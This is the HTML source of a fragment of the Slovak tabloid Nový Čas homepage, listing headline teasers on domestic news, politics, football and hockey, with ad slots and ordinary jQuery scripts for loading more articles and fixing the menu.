                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330415.jpg/school-supplies-first-day-of-school-photography-koronavirus-ilustracne-skoly-reopening-covid-19-educational-institutions-and-organizations-desk-prazdna-skola-table-vyucovane-closed-vyucovanoe-education-university-studying-empty-social-issues-pandemic-illness-infectious-disease-coronavirus-indoors-wood-material-disinfection-equipment-elementary-school-school-building-vyucovanie-classroom-clean-high-school-furniture-chair-empty-desk-back-to-school-education-building-attending-tiled-floor.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3330415.jpg/school-supplies-first-day-of-school-photography-koronavirus-ilustracne-skoly-reopening-covid-19-educational-institutions-and-organizations-desk-prazdna-skola-table-vyucovane-closed-vyucovanoe-education-university-studying-empty-social-issues-pandemic-illness-infectious-disease-coronavirus-indoors-wood-material-disinfection-equipment-elementary-school-school-building-vyucovanie-classroom-clean-high-school-furniture-chair-empty-desk-back-to-school-education-building-attending-tiled-floor.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3330415.jpg/school-supplies-first-day-of-school-photography-koronavirus-ilustracne-skoly-reopening-covid-19-educational-institutions-and-organizations-desk-prazdna-skola-table-vyucovane-closed-vyucovanoe-education-university-studying-empty-social-issues-pandemic-illness-infectious-disease-coronavirus-indoors-wood-material-disinfection-equipment-elementary-school-school-building-vyucovanie-classroom-clean-high-school-furniture-chair-empty-desk-back-to-school-education-building-attending-tiled-floor.jpg"></noscript>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 21:28&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/spravy/domace-spravy/" title="Domáce správy">Domáce správy                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-2-nadpis"
                            href="/clanok/2537961/pandemia-sa-podpisala-pod-vedomosti-letne-doucovanie-pre-ziakov-zakladnych-a-strednych-skol/"
                            title="Pandémia sa podpísala pod vedomosti: Letné doučovanie pre žiakov základných a stredných škôl">Pandémia sa podpísala pod vedomosti: Letné doučovanie pre žiakov základných a stredných škôl                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-2-nadpis"
                            href="/clanok/2537961/pandemia-sa-podpisala-pod-vedomosti-letne-doucovanie-pre-ziakov-zakladnych-a-strednych-skol/"
                            title="Pandémia sa podpísala pod vedomosti: Letné doučovanie pre žiakov základných a stredných škôl">Pandémia sa podpísala pod vedomosti: Letné doučovanie pre žiakov základných a stredných škôl                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>
                <div class="sm-clear"></div>
            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2537957/nicklas-bendtner-ukoncil-futbalovu-karieru-premarneny-talent-ktory-miloval-prostitutky/"
                    data-event="clanok|box-nekonecne-spravy|clanok-3-obrazok"
                    title="Nicklas Bendtner ukončil futbalovú kariéru: Premárnený talent, ktorý miloval prostitútky!">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330409.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330409.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330409.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3330409.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3330409.jpg"></noscript>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 21:06&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/sport/futbal/" title="Futbal">Futbal                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-3-nadpis"
                            href="/clanok/2537957/nicklas-bendtner-ukoncil-futbalovu-karieru-premarneny-talent-ktory-miloval-prostitutky/"
                            title="Nicklas Bendtner ukončil futbalovú kariéru: Premárnený talent, ktorý miloval prostitútky!">Nicklas Bendtner ukončil futbalovú kariéru: Premárnený talent, ktorý miloval prostitútky!                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-3-nadpis"
                            href="/clanok/2537957/nicklas-bendtner-ukoncil-futbalovu-karieru-premarneny-talent-ktory-miloval-prostitutky/"
                            title="Nicklas Bendtner ukončil futbalovú kariéru: Premárnený talent, ktorý miloval prostitútky!">Nicklas Bendtner ukončil futbalovú kariéru: Premárnený talent, ktorý miloval prostitútky!                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>

            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2537951/potopi-sme-rodina-ministra-mikulca-pri-odvolavani-jasne-stanovisko-hnutia/"
                    data-event="clanok|box-nekonecne-spravy|clanok-4-obrazok"
                    title="Potopí Sme rodina ministra Mikulca pri odvolávaní? Jasné stanovisko hnutia">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330391.jpg/roman-mikulec-mikulec.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330391.jpg/roman-mikulec-mikulec.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330391.jpg/roman-mikulec-mikulec.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3330391.jpg/roman-mikulec-mikulec.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3330391.jpg/roman-mikulec-mikulec.jpg"></noscript>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 21:04&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/spravy/politika/" title="Politika">Politika                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-4-nadpis"
                            href="/clanok/2537951/potopi-sme-rodina-ministra-mikulca-pri-odvolavani-jasne-stanovisko-hnutia/"
                            title="Potopí Sme rodina ministra Mikulca pri odvolávaní? Jasné stanovisko hnutia">Potopí Sme rodina ministra Mikulca pri odvolávaní? Jasné stanovisko hnutia                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-4-nadpis"
                            href="/clanok/2537951/potopi-sme-rodina-ministra-mikulca-pri-odvolavani-jasne-stanovisko-hnutia/"
                            title="Potopí Sme rodina ministra Mikulca pri odvolávaní? Jasné stanovisko hnutia">Potopí Sme rodina ministra Mikulca pri odvolávaní? Jasné stanovisko hnutia                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>
                <div class="sm-clear"></div>
            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2537939/futbalisti-argentiny-odhalili-maradonovu-60-sochu-dojimavy-odkaz-messiho/"
                    data-event="clanok|box-nekonecne-spravy|clanok-5-obrazok"
                    title="Futbalisti Argentíny odhalili Maradonovu († 60) sochu: Dojímavý odkaz Messiho!">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330367.jpg/diego-maradona-socha.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330367.jpg/diego-maradona-socha.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330367.jpg/diego-maradona-socha.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3330367.jpg/diego-maradona-socha.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3330367.jpg/diego-maradona-socha.jpg"></noscript>        <div class="article-play-button">
            <div class="play-icon"></div>
        </div>    <div class="flags"><span class="flag">Foto</span>    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 20:30&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/sport/futbal/" title="Futbal">Futbal                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-5-nadpis"
                            href="/clanok/2537939/futbalisti-argentiny-odhalili-maradonovu-60-sochu-dojimavy-odkaz-messiho/"
                            title="Futbalisti Argentíny odhalili Maradonovu († 60) sochu: Dojímavý odkaz Messiho!">Futbalisti Argentíny odhalili Maradonovu († 60) sochu: Dojímavý odkaz Messiho!                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-5-nadpis"
                            href="/clanok/2537939/futbalisti-argentiny-odhalili-maradonovu-60-sochu-dojimavy-odkaz-messiho/"
                            title="Futbalisti Argentíny odhalili Maradonovu († 60) sochu: Dojímavý odkaz Messiho!">Futbalisti Argentíny odhalili Maradonovu († 60) sochu: Dojímavý odkaz Messiho!                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>

            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2537941/vyborna-sprava-pre-navstevnikov-domase-oblubena-atrakcia-zacne-prevadzku-uz-tento-vikend/"
                    data-event="clanok|box-nekonecne-spravy|clanok-6-obrazok"
                    title="Výborná správa pre návštevníkov Domaše: Obľúbená atrakcia začne prevádzku už tento víkend">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330363.jpg/lod-domasa-bohemia.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330363.jpg/lod-domasa-bohemia.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330363.jpg/lod-domasa-bohemia.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3330363.jpg/lod-domasa-bohemia.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3330363.jpg/lod-domasa-bohemia.jpg"></noscript>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 20:06&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/spravy/domace-spravy/" title="Domáce správy">Domáce správy                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-6-nadpis"
                            href="/clanok/2537941/vyborna-sprava-pre-navstevnikov-domase-oblubena-atrakcia-zacne-prevadzku-uz-tento-vikend/"
                            title="Výborná správa pre návštevníkov Domaše: Obľúbená atrakcia začne prevádzku už tento víkend">Výborná správa pre návštevníkov Domaše: Obľúbená atrakcia začne prevádzku už tento víkend                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-6-nadpis"
                            href="/clanok/2537941/vyborna-sprava-pre-navstevnikov-domase-oblubena-atrakcia-zacne-prevadzku-uz-tento-vikend/"
                            title="Výborná správa pre návštevníkov Domaše: Obľúbená atrakcia začne prevádzku už tento víkend">Výborná správa pre návštevníkov Domaše: Obľúbená atrakcia začne prevádzku už tento víkend                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>
                <div class="sm-clear"></div>
            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2537943/usa-si-uctili-obete-zabite-v-pekingu-ostry-odkaz-ciny-ktory-necakal-asi-nikto/"
                    data-event="clanok|box-nekonecne-spravy|clanok-7-obrazok"
                    title="USA si uctili obete zabité v Pekingu: Ostrý odkaz Číny, ktorý nečakal asi nikto">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330373.jpg/cina-aktivisti-pamiatka-protest-peking-tokio-uctenie.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330373.jpg/cina-aktivisti-pamiatka-protest-peking-tokio-uctenie.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330373.jpg/cina-aktivisti-pamiatka-protest-peking-tokio-uctenie.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3330373.jpg/cina-aktivisti-pamiatka-protest-peking-tokio-uctenie.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3330373.jpg/cina-aktivisti-pamiatka-protest-peking-tokio-uctenie.jpg"></noscript>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 20:04&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/spravy/zahranicne-spravy/" title="Zahraničné správy">Zahraničné správy                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-7-nadpis"
                            href="/clanok/2537943/usa-si-uctili-obete-zabite-v-pekingu-ostry-odkaz-ciny-ktory-necakal-asi-nikto/"
                            title="USA si uctili obete zabité v Pekingu: Ostrý odkaz Číny, ktorý nečakal asi nikto">USA si uctili obete zabité v Pekingu: Ostrý odkaz Číny, ktorý nečakal asi nikto                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-7-nadpis"
                            href="/clanok/2537943/usa-si-uctili-obete-zabite-v-pekingu-ostry-odkaz-ciny-ktory-necakal-asi-nikto/"
                            title="USA si uctili obete zabité v Pekingu: Ostrý odkaz Číny, ktorý nečakal asi nikto">USA si uctili obete zabité v Pekingu: Ostrý odkaz Číny, ktorý nečakal asi nikto                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>

            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2537567/mladik-to-poriadne-rozbalil-na-policajtku-takto-strazcov-zakona-zaskoci-len-malokto/"
                    data-event="clanok|box-nekonecne-spravy|clanok-8-obrazok"
                    title="Mladík to poriadne rozbalil na policajtku: Takto strážcov zákona zaskočí len málokto">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3329443.jpg/mladik-to-poriadne-rozbalil-na-policajtku.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3329443.jpg/mladik-to-poriadne-rozbalil-na-policajtku.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3329443.jpg/mladik-to-poriadne-rozbalil-na-policajtku.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3329443.jpg/mladik-to-poriadne-rozbalil-na-policajtku.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3329443.jpg/mladik-to-poriadne-rozbalil-na-policajtku.jpg"></noscript>        <div class="article-play-button">
            <div class="play-icon"></div>
        </div>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 20:02&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/spravy/zahranicne-spravy/" title="Zahraničné správy">Zahraničné správy                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-8-nadpis"
                            href="/clanok/2537567/mladik-to-poriadne-rozbalil-na-policajtku-takto-strazcov-zakona-zaskoci-len-malokto/"
                            title="Mladík to poriadne rozbalil na policajtku: Takto strážcov zákona zaskočí len málokto">Mladík to poriadne rozbalil na policajtku: Takto strážcov zákona zaskočí len málokto                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-8-nadpis"
                            href="/clanok/2537567/mladik-to-poriadne-rozbalil-na-policajtku-takto-strazcov-zakona-zaskoci-len-malokto/"
                            title="Mladík to poriadne rozbalil na policajtku: Takto strážcov zákona zaskočí len málokto">Mladík to poriadne rozbalil na policajtku: Takto strážcov zákona zaskočí len málokto                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>
                <div class="sm-clear"></div>
            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2536119/zena-poslala-fitnes-trenerovi-fotky-v-spodnej-bielizni-po-tom-co-jej-odpisal-sa-este-teraz-hanbi/"
                    data-event="clanok|box-nekonecne-spravy|clanok-9-obrazok"
                    title="Žena poslala fitnes trénerovi fotky v spodnej bielizni: Po tom, čo jej odpísal, sa ešte teraz hanbí!">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3326385.png/fotky-trener-spodne-pradlo-trapas-omyl-fitnes-trener-gemma-hill.png"
                        data-1024="https://img.cas.sk/cas/320px-c1/3326385.png/fotky-trener-spodne-pradlo-trapas-omyl-fitnes-trener-gemma-hill.png"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3326385.png/fotky-trener-spodne-pradlo-trapas-omyl-fitnes-trener-gemma-hill.png"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3326385.png/fotky-trener-spodne-pradlo-trapas-omyl-fitnes-trener-gemma-hill.png"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3326385.png/fotky-trener-spodne-pradlo-trapas-omyl-fitnes-trener-gemma-hill.png"></noscript>    <div class="flags"><span class="flag">Foto</span>    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 20:00&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/spravy/zahranicne-spravy/" title="Zahraničné správy">Zahraničné správy                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-9-nadpis"
                            href="/clanok/2536119/zena-poslala-fitnes-trenerovi-fotky-v-spodnej-bielizni-po-tom-co-jej-odpisal-sa-este-teraz-hanbi/"
                            title="Žena poslala fitnes trénerovi fotky v spodnej bielizni: Po tom, čo jej odpísal, sa ešte teraz hanbí!">Žena poslala fitnes trénerovi fotky v spodnej bielizni: Po tom, čo jej odpísal, sa ešte teraz hanbí!                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-9-nadpis"
                            href="/clanok/2536119/zena-poslala-fitnes-trenerovi-fotky-v-spodnej-bielizni-po-tom-co-jej-odpisal-sa-este-teraz-hanbi/"
                            title="Žena poslala fitnes trénerovi fotky v spodnej bielizni: Po tom, čo jej odpísal, sa ešte teraz hanbí!">Žena poslala fitnes trénerovi fotky v spodnej bielizni: Po tom, čo jej odpísal, sa ešte teraz hanbí!                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>

            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2537933/erik-cernak-sa-opat-predviedol-takto-zastavil-precislenie-supera/"
                    data-event="clanok|box-nekonecne-spravy|clanok-10-obrazok"
                    title="Erik Černák sa opäť predviedol: Takto zastavil prečíslenie súpera!">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330337.jpg/hokej-erik-cernak.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330337.jpg/hokej-erik-cernak.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330337.jpg/hokej-erik-cernak.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3330337.jpg/hokej-erik-cernak.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3330337.jpg/hokej-erik-cernak.jpg"></noscript>        <div class="article-play-button">
            <div class="play-icon"></div>
        </div>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 19:55&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/sport/hokej/" title="Hokej">Hokej                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-10-nadpis"
                            href="/clanok/2537933/erik-cernak-sa-opat-predviedol-takto-zastavil-precislenie-supera/"
                            title="Erik Černák sa opäť predviedol: Takto zastavil prečíslenie súpera!">Erik Černák sa opäť predviedol: Takto zastavil prečíslenie súpera!                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-10-nadpis"
                            href="/clanok/2537933/erik-cernak-sa-opat-predviedol-takto-zastavil-precislenie-supera/"
                            title="Erik Černák sa opäť predviedol: Takto zastavil prečíslenie súpera!">Erik Černák sa opäť predviedol: Takto zastavil prečíslenie súpera!                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>
                <div class="sm-clear"></div>
            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2537937/facebook-urcil-dlzku-trumpovho-trestu-na-socialnu-siet-sa-nedostane-velmi-dlhy-cas/"
                    data-event="clanok|box-nekonecne-spravy|clanok-11-obrazok"
                    title="Facebook určil dĺžku Trumpovho trestu: Na sociálnu sieť sa nedostane veľmi dlhý čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330349.jpg/donald-trump-strelba-biely-dom.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330349.jpg/donald-trump-strelba-biely-dom.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330349.jpg/donald-trump-strelba-biely-dom.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3330349.jpg/donald-trump-strelba-biely-dom.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3330349.jpg/donald-trump-strelba-biely-dom.jpg"></noscript>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 19:46&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/spravy/zahranicne-spravy/" title="Zahraničné správy">Zahraničné správy                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-11-nadpis"
                            href="/clanok/2537937/facebook-urcil-dlzku-trumpovho-trestu-na-socialnu-siet-sa-nedostane-velmi-dlhy-cas/"
                            title="Facebook určil dĺžku Trumpovho trestu: Na sociálnu sieť sa nedostane veľmi dlhý čas">Facebook určil dĺžku Trumpovho trestu: Na sociálnu sieť sa nedostane veľmi dlhý čas                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-11-nadpis"
                            href="/clanok/2537937/facebook-urcil-dlzku-trumpovho-trestu-na-socialnu-siet-sa-nedostane-velmi-dlhy-cas/"
                            title="Facebook určil dĺžku Trumpovho trestu: Na sociálnu sieť sa nedostane veľmi dlhý čas">Facebook určil dĺžku Trumpovho trestu: Na sociálnu sieť sa nedostane veľmi dlhý čas                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>

            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2537633/extremne-cenna-rada-od-cestovatela-martina-hanzela-ako-neprist-o-peniaze-pri-krachu-aerolinky-alebo-cestovky/"
                    data-event="clanok|box-nekonecne-spravy|clanok-12-obrazok"
                    title="Extrémne cenná rada od cestovateľa Martina Hanzela: Ako neprísť o peniaze pri krachu aerolinky alebo cestovky!">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3329573.jpg/martin-hanzel.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3329573.jpg/martin-hanzel.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3329573.jpg/martin-hanzel.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3329573.jpg/martin-hanzel.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3329573.jpg/martin-hanzel.jpg"></noscript>        <div class="article-play-button">
            <div class="play-icon"></div>
        </div>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 19:45&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/spravy/domace-spravy/" title="Domáce správy">Domáce správy                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-12-nadpis"
                            href="/clanok/2537633/extremne-cenna-rada-od-cestovatela-martina-hanzela-ako-neprist-o-peniaze-pri-krachu-aerolinky-alebo-cestovky/"
                            title="Extrémne cenná rada od cestovateľa Martina Hanzela: Ako neprísť o peniaze pri krachu aerolinky alebo cestovky!">Extrémne cenná rada od cestovateľa Martina Hanzela: Ako neprísť o peniaze pri krachu aerolinky alebo cestovky!                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-12-nadpis"
                            href="/clanok/2537633/extremne-cenna-rada-od-cestovatela-martina-hanzela-ako-neprist-o-peniaze-pri-krachu-aerolinky-alebo-cestovky/"
                            title="Extrémne cenná rada od cestovateľa Martina Hanzela: Ako neprísť o peniaze pri krachu aerolinky alebo cestovky!">Extrémne cenná rada od cestovateľa Martina Hanzela: Ako neprísť o peniaze pri krachu aerolinky alebo cestovky!                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>
                <div class="sm-clear"></div>
    </div>

    <div class="hp-bottom-list-more-button-wrapper">
        <button data-page="1" class="hp-bottom-list-more-button transparent-button dark-font" id="button_get_list">Ďalšie správy</button>
    </div>

</div>

<script type="text/javascript">

    var get_articles_from = 1;

    document.getElementById('button_get_list').onclick=function(){get_list(get_articles_from++);};

    function get_list(from) {
        var $btn = $('#button_get_list');
        $btn.attr('disabled', true);

        let orig_text = $btn.html();
        $btn.html('Načítavam');
        $btn.css('filter','opacity(0.5)')
        $btn.css('cursor','not-allowed');

        var url = '/ajax/get_article_list/'+from+'?limit=12';

        $.get(url, function(d){
            if (d) {
                $('#article_list').append(d);
                if (d.match(/<!-- \.smallPost -->/g).length < 12) {
                    $btn.fadeOut(500);
                } else {
                    $btn.attr('disabled', false);
                    $btn.html(orig_text);
                    $btn.css('filter', '');
                    $btn.css('cursor', '');
                }
            }
        });
    }
</script>
        </div>
    </section>
    <section class="side-section xs-hidden sm-hidden">
        <div class="iframe-banner-desktop"><div class="rs-advertisement rs-advertisement-cas-desktop-hp-mid3"><!-- Reklamna plocha cas-desktop-hp-mid3 -->
  <div id='mid3' style="border: 0pt none; display: inline-block;">
    <script>
      googletag.cmd.push(function() { googletag.display('mid3'); });
    </script>
  </div>
</div>        </div>
        <div class="floating-square-scrolling"><!--
<div class="floating-square-scrolling" style="top: 0px; position: relative;">
  <div class="rs-advertisement rs-advertisement-cas-desktop-ak-scrolling">
    <div id='other4'>
      <script>
        googletag.cmd.push(function() { googletag.display('other4'); });
      </script>
    </div>
  </div>
</div>
<script style="">$('.floating-square-scrolling').floating({ wrapper: '#article-list', offsetTop: 35 });</script>
-->

<div class="rs-advertisement rs-advertisement-cas-desktop-square-scrolling pl-md-10">
  <!-- Reklamna plocha cas-desktop-square-scrolling -->
    <div id='other4' style="max-height:600px; width:300px;margin-top:20px;box-sizing: border-box;">
      <script>
        googletag.cmd.push(function() { googletag.display('other4'); });
      </script>
    </div>     
</div>
        </div>
        <script>$('.floating-square-scrolling').floating({ wrapper: '#article-list', offsetTop: 35 });</script>
    </section>
</div>
<section><div class="rs-advertisement rs-advertisement-cas-desktop-screen-bottom">
  <!-- Reklamna plocha cas-desktop-screen-bottom -->
  <div id="div-gpt-ad-cas-desktop-screen-bottom" style="box-sizing: border-box;text-align: center;" data-google-query-id="CM7r9NXmyegCFQShewodeyYHhw">
    <div id='other1'>
      <script>
        googletag.cmd.push(function() { googletag.display('other1'); });
      </script>
    </div>
  </div>
</div></section>
				</div>
				<div class="rs-advertisement rs-advertisement-cas-desktop-screen-bottom">				</div>
			</div>
		</div>
		<!-- Footer --><style>
    @import url("https://cdn.cas.sk/cas/css/YXBpfGRlZmF1bHR8YWxsfGF6ZXRCdXR0b258fDAtMHxkM2IxMTZmNTlhOTdmN2RhZmJmNGE5NGQyNDgxNTVmMQ==.css?v=3");
</style>
<script type="text/javascript">
    /**
     * SlideMenu fix
     * #63663
     */
    (function () {
        var d = document;
        function transitionEndEvent() {
            var el = d.createElement('div'),
                transitions = {
                    'transition': 'transitionend',
                    'OTransition': 'otransitionend',
                    'MozTransition': 'transitionend',
                    'WebkitTransition': 'webkitTransitionEnd'
                };
            for (var i in transitions) {
                if (transitions.hasOwnProperty(i) && typeof el.style[i] !== 'undefined') {
                    return transitions[i];
                }
            }
        }
        var transitionEnd = transitionEndEvent();
        var page = d.querySelector("#page");
        var slide = d.querySelector("#slide-menu");
        var burger = d.querySelector("#side-menu-main-menu-toggler");
        var container = $(".page-container");
        page.addEventListener(transitionEnd, function () {
            if ($(d).width() > 479) {
                return;
            }
            if (slide.style.display === 'block') {
                container.hide();
            }
        }, false);
        if (burger) {
            burger.addEventListener("click", function () {
                container.show();
            });
        }
    })();
</script>

